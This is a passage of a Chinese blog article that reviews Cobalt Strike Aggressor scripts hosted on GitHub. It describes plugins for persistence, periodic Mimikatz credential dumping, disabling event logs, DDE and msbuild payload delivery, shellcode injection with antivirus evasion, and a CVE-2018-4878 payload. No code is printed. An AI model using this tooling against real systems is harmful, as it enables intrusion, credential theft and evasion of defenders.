src="https://wechat2rss.xlab.app/img-proxy/?k=cfbe620d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUe9oU8k5lXc7R6P5icNNe9tcS64rjSCMROcRLllmh96Hv6FenLCFJ1xA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>http.cna</strong> 算是cs脚本编写当中http请求的一个小demo，载入后会自动发出一个获取当前ip的请求。<br/><strong>powershell.cna</strong> 会在右键菜单当中增加一个powershell选项，包含powerup、bloodhood等，不过PS12文件作者并没有放到目录下，需要自己去找。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7395498392282959" data-s="300,640" style="" data-type="png" data-w="311" src="https://wechat2rss.xlab.app/img-proxy/?k=3c486232&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUUSWvSra7rsuibLbXAzWN1z7qB6vgFXRkDQ7dwweaicxpDjZXG2h6QN7w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>web.cna</strong> 会直接起一个test的web，输出在script console里。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>15、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍几个附属在一个大集合项目当中的小脚本。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3307291666666667" data-s="300,640" style="" data-type="png" data-w="3072" src="https://wechat2rss.xlab.app/img-proxy/?k=5ac1f27d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1qVjmKtC3nYA7QhcorXwlbvgia1wHHwicaDTSErQn8EY43cGrscrEa7HQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/gaudard/scripts/tree/master/red-team/aggressor" target="_blank">https://github.com/gaudard/scripts/tree/master/red-team/aggressor</a><br/><strong>Admin.cna</strong> 主要是借助 netsh 实现添加端口规则、展示规则、删除规则等操作的一个脚本，作者的代码写得比较简约，没有在命令行中对命令进行注册，所以help是看不到命令的，直接在命令行里输入命令就会执行对应的操作，说白了是对手打命令的一个简化。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.24857685009487665" data-s="300,640" style="" data-type="png" data-w="1054" src="https://wechat2rss.xlab.app/img-proxy/?k=39db0399&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUAYpicUIt554nA8icGibMg56fKd7bUabHIa48VoriblgBaaEPjzIicicEkjkA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>attacks.cna</strong> 包含几个整蛊功能，Deny 包括修改hosts文件、替换hosts文件、关机、禁用网络四个功能。Lulz 包含IE打开网页、Clippy复活、弹框（win7+）三个功能。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.053941908713693" data-s="300,640" style="" data-type="png" data-w="241" src="https://wechat2rss.xlab.app/img-proxy/?k=7e05a411&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUJ1OUJ0WVsCMENhg7PeuB3HTfjbWS27rWUsmxVfWibsiaCdUaNsnJfPKw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>beacon_initial.cna </strong>有点让人看不透，机器上线之后操作太多了。<br/><strong>persistence.cna</strong> 会增加八种持久控制的手法，不过个人认为写的和上一个一样有点暴力。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8722627737226277" data-s="300,640" style="" data-type="png" data-w="274" src="https://wechat2rss.xlab.app/img-proxy/?k=b5b6444a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUZxgLw75sNpGe1QjZVfiagIBic8AHDlkN1tEWGfyTXJJbnkHxjL2jnxibw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>16、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">作者收集的几个脚本，有和前面相似的地方。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3844121532364597" data-s="300,640" style="" data-type="png" data-w="3028" src="https://wechat2rss.xlab.app/img-proxy/?k=7a264e75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr10AWHtfKCQfRlf11qDMPKzcObbKqDicPNJjxlnLIiceI9nHICCjicW31zA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/branthale/CobaltStrikeCNA" target="_blank">https://github.com/branthale/CobaltStrikeCNA</a><br/><strong>Beaconpire.cna</strong> 可以与 empire 联动，可以在顶部菜单配置server信息，并在右键菜单通过图形界面管理listener。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5255972696245734" data-s="300,640" style="" data-type="png" data-w="293" src="https://wechat2rss.xlab.app/img-proxy/?k=6939f423&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6cVkex7yoqtowiaibn8IMiaS2eB9xzGADphfPmR0kYccgl1fn6qD1BoVQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.49053627760252366" data-s="300,640" style="" data-type="png" data-w="634" src="https://wechat2rss.xlab.app/img-proxy/?k=e77effbd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUjBWE2pqFlUQWoy7lMjfUjjIWMsDMIp77wiahTMmCCbN3iaVMdf8EfXsw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>dnstxt_checkin.cna</strong> 会自动将初始化信息为空的 beacon 通过DNS-txt 方式弹shell，并设定sleep时间等。<br/><strong>Mimikatz30min.cna</strong> 是bluscreenofjeff的原脚本，每30分钟mimi一下，时间可以自己在脚本当中修改。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6968911917098446" data-s="300,640" style="" data-type="png" data-w="386" src="https://wechat2rss.xlab.app/img-proxy/?k=4afe5817&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUHpNyAo1RYz8pLwrvqrseLI5ic9pOO9QB5QKqZXDncJ8OrsVPxY9WJDg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>Sleep_Menu.cna</strong> 会提供一个图形化的界面来管理sleep的时间间隔和抖动频率。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6909722222222222" data-s="300,640" style="" data-type="png" data-w="288" src="https://wechat2rss.xlab.app/img-proxy/?k=9d6ad2fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUZAV1KsLy5y9ZRuSIEZT9d1T1lGkG84hyRCSO4gPFAAqV9OMzud9Ptw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>17、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面是一个修改自VYsec版本的CVE-2018-4878，测试没有体验出区别。<br/>地址：<a href="https://github.com/hybridious/CVE-2018-4878" target="_blank">https://github.com/hybridious/CVE-2018-4878</a><br/>CVE-2018-4878.cna 的作用就是起一个 CVE-2018-4878 的payload。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.41721854304635764" data-s="300,640" style="" data-type="png" data-w="604" src="https://wechat2rss.xlab.app/img-proxy/?k=4d84f9d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU9Xlbwfq6QVIcoqoMuSH9VJPsDPVUeLpDA6ibZmWCiaSqzHrDK6tNajog%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>18、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面是几个比较简单的脚本。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/oldb00t/AggressorScripts" target="_blank">https://github.com/oldb00t/AggressorScripts</a><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.3097560975609756" data-s="300,640" style="" data-type="png" data-w="3280" src="https://wechat2rss.xlab.app/img-proxy/?k=a253db1e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1AdcniaauC2ibQrj1BeEGrwFfsMSOam7OOmwYXYvndD9fhL0TjOTkkiaVw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>beacon-aliases.cna </strong>增加了很多很多别名，整个 scripts 目录的脚本以及其他的几个小功能，不过别名都没有注册在命令行里，使用起来需要自己去代码里看看然后去命令行直接执行。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.9480225988700565" data-s="300,640" style="" data-type="png" data-w="885" src="https://wechat2rss.xlab.app/img-proxy/?k=97737234&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUs7AXeeibc1TH0dNxbRia85jglVoaZGaMCONchQUe3bGHChy5TFrXQRbQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>beacon-ps-highlight.cna </strong>是又一个程序列表上色操作，红绿蓝三种颜色，意义参考前面的。<br/><strong>jacob-tools-loader.cna </strong>会一键载入以上脚本。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>19、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍头像让人记忆比较深刻的老哥的两个脚本。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.32829046898638425" data-s="300,640" style="" data-type="png" data-w="2644" src="https://wechat2rss.xlab.app/img-proxy/?k=46904894&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1N6SKialfdzSribz2OxbJicr2JoibtaVVBTibpV8Rt0bT25driaoRWX7qtBCg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：<br/><a href="https://github.com/p292/Phant0m_cobaltstrike" target="_blank">https://github.com/p292/Phant0m_cobaltstrike</a><br/><a href="https://github.com/p292/DDEAutoCS" target="_blank">https://github.com/p292/DDEAutoCS</a><br/><strong>disableeventvwr.cna</strong> 加载 Invoke-Phant0m.ps1 禁用事件查看器。<br/><strong>ddeauto.cna</strong> 可以一键起一个psh的payload server，然后生成DDE一键上线语句，Ctrl+F9添加。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7847953216374269" data-s="300,640" style="" data-type="png" data-w="855" src="https://wechat2rss.xlab.app/img-proxy/?k=a9027cc2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUzuBp4gQ8N4vlnVAAsHtm1OVSNPOBhEgJAaQfvILSPUhEVBhibicq4KlA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5257009345794392" data-s="300,640" style="" data-type="png" data-w="856" src="https://wechat2rss.xlab.app/img-proxy/?k=b7839732&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU1JD7Rx9kkkRhvp8iaoNkoFwywXWRfzRmbeFXrzEgicgEud65TJC2MFeg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>20、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>slack-alerts.cna</strong> 修改自蓝屏哥，配置好之后会通过slack进行通知，作者预置了5个事件，git上有介绍。<br/>地址：<a href="https://github.com/secgroundzero/CS-Aggressor-Scripts" target="_blank">https://github.com/secgroundzero/CS-Aggressor-Scripts</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.20636792452830188" data-s="300,640" style="" data-type="png" data-w="848" src="https://wechat2rss.xlab.app/img-proxy/?k=b2e6948d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUQhKMpM3VNUx3ElzibwfIicmqlW3k2tzcP4j9Wco09ia8mkUm7VPYDicFmg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>21、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>powershell_survey.cna</strong> 是一个借助 PSH 检测目标机器状况的插件，检测对象包括PSH和.NET。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/skyleronken/Aggressor-Scripts" target="_blank">https://github.com/skyleronken/Aggressor-Scripts</a><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7570422535211268" data-s="300,640" style="" data-type="png" data-w="284" src="https://wechat2rss.xlab.app/img-proxy/?k=4d6c9930&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUXy4w57PsEwR8aicyg215GlVX5EBzwctA865uSb7eqRBCVfHZTS7YqOQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>22、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面要介绍的这个小插件就有点精彩了，第一个版本算是cs的<strong>powerview</strong>（PowerSploit和Empire中都有）集成，第二个版本作者把 自己写的 <strong>SharpView</strong> 也实现在了cna脚本当中，个人认为想法和功能都比较优秀。<br/>地址：<br/><a href="https://github.com/tevora-threat/aggressor-powerview" target="_blank">https://github.com/tevora-threat/aggressor-powerview</a><br/><a href="https://github.com/tevora-threat/PowerView3-Aggressor" target="_blank">https://github.com/tevora-threat/PowerView3-Aggressor</a><br/>功能比较多，简单做了两张图列出所有功能的同时也可以对两个版本前后做一个对比。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=fd50a53c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUDIWoKByfJFzc9TribbSK0TfCk4lHAJYeJoPWy1hW2ibVWaUBu1Kuibvyg%2F640%3Fwx_fmt%3Djpeg"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=bd561f38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUqRrp4mlZr0E68GqCliaXPuqRUjl3Z1zS8PTMTlZ1zbIN4pZ9GBNKRgA%2F640%3Fwx_fmt%3Djpeg"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>23、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面这位师傅比较高产，除了这里一股脑的几个cna脚本，git上还有几个profile可以自己参考。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.32733408323959506" data-s="300,640" style="" data-type="png" data-w="3556" src="https://wechat2rss.xlab.app/img-proxy/?k=835e7502&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1RMibXsEVe54uveT6Kv3Nibspj9FYtDrpVvd7L75t7EqcodLNqbF5icibsQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);">地址：<br/><a href="https://github.com/threatexpress/aggressor-scripts" target="_blank">https://github.com/threatexpress/aggressor-scripts</a><br/><a href="https://github.com/threatexpress/red-team-scripts" target="_blank">https://github.com/threatexpress/red-team-scripts</a><br/><a href="https://github.com/threatexpress/persistence-aggressor-script" target="_blank">https://github.com/threatexpress/persistence-aggressor-script</a><br/><strong>automigrate.cna</strong> 的功能是机器上线时按照设置自动进行进程迁移，但是测试一有点问题。<br/><strong>handler.cna</strong> 主要功能是对于sleep的优化，会标记已经dead的会话，会对SMB类型的会话单独标记等，同时对automigrate也起到一定的辅助作用。<br/><strong>init.cna</strong> 是上面两个脚本的主脚本，同时对于上面两个脚本的全局设置（比如automigrate的开关与否）也在这个脚本中进行。<br/><strong>make_webview.cna</strong> 的功能是可以一键生成一个如下图所示的html展示页面。使用方法是载入 make_webview.cna 脚本之后在script console 当中执行make_webview 命令，此时会生成teamserver对应的excel信息，再执行脚本目录中的 beacons_to_json.py 脚本就会生成对应的beacons.json 文件，html的展示就是基于该文件的。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7018150388936906" data-s="300,640" style="" data-type="png" data-w="1157" src="https://wechat2rss.xlab.app/img-proxy/?k=41c998a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUPwXBWhtE6kaequLZfOiaoJWMZFuMChP7H8jFZRriaXVDzfXsqjQoRnicg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>enumerate.cna</strong> 的功能是对系统文件列表、powershell和.NET的安装情况等等信息进行搜集和展示，对linux也在SSH中注册了一个enumerate 命令，也是对一些系统信息及IP信息等的列举。<br/>persistence.cna 就是更新之前的ZonkSec版本，上面有提到这里不再重复介绍。<br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>24、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面这个小合集和 harleyQu1nn 比较相似，一并介绍一下。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4906166219839142" data-s="300,640" style="" data-type="png" data-w="2984" src="https://wechat2rss.xlab.app/img-proxy/?k=e5e8d8e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1krbGB8ntdjXv5H1YL8Lxoibo9qDWXIUicEqMsAD35KDTnSUOXeyYwtoA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/FortyNorthSecurity/AggressorAssessor" target="_blank">https://github.com/FortyNorthSecurity/AggressorAssessor</a><br/><strong>persist_assist.cna </strong>如下图所示增加了三种持久化的方式。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.68125" data-s="300,640" style="" data-type="png" data-w="320" src="https://wechat2rss.xlab.app/img-proxy/?k=9b4bc5c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUY2yYxno50giczoibh9NAMjiczzuOtNic94CXpvWHQ5CrIAxuXcS7D1ax4g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>ArtifactPayloadGenerator.cna</strong> 和 <strong>SMBPayloadGenerator.cna</strong> 是两个payload构造器。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.22310756972111553" data-s="300,640" style="" data-type="png" data-w="502" src="https://wechat2rss.xlab.app/img-proxy/?k=43e7778f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUA2Z7qMGXyHHuuKPjoYZqSe8riahAXcPI5ozwMnNZEUBM8SsqwuAIvFA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>text_aggressor.cna</strong> 可以实现机器上线邮件通知，具体配置在python脚本当中。<br/><strong>EDR.cna</strong> 和harleyQu1nn版本的相比略有改动，但是基本是一样的，都是基于枚举驱动文件等来判断安全产品是否安装。<br/> <strong>ProcessColor.cna </strong>、<strong>redteamrepo.cna</strong> 和原版一模一样。<br/><strong>msbuild_exec.cna</strong> 注册了两条命令：msbuild_cmd、msbuild_script。两者都是将PSH转换为XML文件再借助msbuild执行，区别在于一个是本地转换，另一个是本地读取。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.05435897435897436" data-s="300,640" style="" data-type="png" data-w="975" src="https://wechat2rss.xlab.app/img-proxy/?k=2fd8fab1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUBiaiboz5BJanXOLqWuHgpjiatmLUpGIzVvNjJzIr7Eb4ccQte0dY2ia2Kw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>remote_msbuild.cna </strong>也注册了两条命令，代码基本相同，不过上传路径没有写死。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.058521560574948665" data-s="300,640" style="" data-type="png" data-w="974" src="https://wechat2rss.xlab.app/img-proxy/?k=09aa2f32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUr883fjVLcnkicpJIfNcKMJgm2UOrPBkLq8mWmuTecQSib2etm0AVDteg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>compromised_log.rpt</strong> 是一个模板文件。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>25、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面再介绍一个Vincent Yiu团队的作品。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/mdsecactivebreach/CACTUSTORCH" target="_blank">https://github.com/mdsecactivebreach/CACTUSTORCH</a><br/><strong>CACTUSTORCH.cna</strong> 只是整个项目当中的一部分，该项目可以实现通过JavaScript和VBScript进行shellcode注入。开始的时候免杀效果好一些，后来被黑客们广泛使用众多杀软打特征码之后杀的比较狠了，国内一些公众号也报道过。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6146788990825688" data-s="300,640" style="" data-type="png" data-w="218" src="https://wechat2rss.xlab.app/img-proxy/?k=0d0e6c11&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6TC7e6P4G8nqhYyiab5EicfmOnuP6EVUBibiaFRbKFcqOyk0LhAmsvxHkg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.9710526315789474" data-s="300,640" style="" data-type="png" data-w="380" src="https://wechat2rss.xlab.app/img-proxy/?k=bc165c80&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUSZrtkcOv6TMX1WbSdNibYYTnhPzRbMibqBKBTlZl82mYtDqV9CIaEEqA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>26、</strong></span><strong><span style="font-size: 15px;color: rgb(66, 63, 63);">SharpHound</span></strong><span style="font-size: 15px;color: rgb(66, 63, 63);"> 是C＃重写的BloodHound，这里要讲的插件就是基于cs 的一个 SharpHound 辅助插件，项目比较新。<br/>地址：</span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/C0axx/AggressorScripts" target="_blank">https://github.com/C0axx/AggressorScripts</a><br/><strong>SharpHound.cna </strong>会在右键菜单当中增加一个 Invoke-Bloodhound 选项，命令执行方式有：PowerPick、PowerShell、Execute-Assembly 三种方式。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6350877192982456" data-s="300,640" style="" data-type="png" data-w="285" src="https://wechat2rss.xlab.app/img-proxy/?k=9814e700&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6G4qTuukwBFgfKN44VcKXetwOggGwD8b14iaPjeD2WicYld9ruV9XnsA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.520618556701031" data-s="300,640" style="" data-type="png" data-w="388" src="https://wechat2rss.xlab.app/img-proxy/?k=69d34cdd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNURBKaGhrGJxvYg8Q8YxZoRvvkcwGKMpQIibKEsgEKhpXbp5EEiafsJJMQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong> 27、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">来自scanf 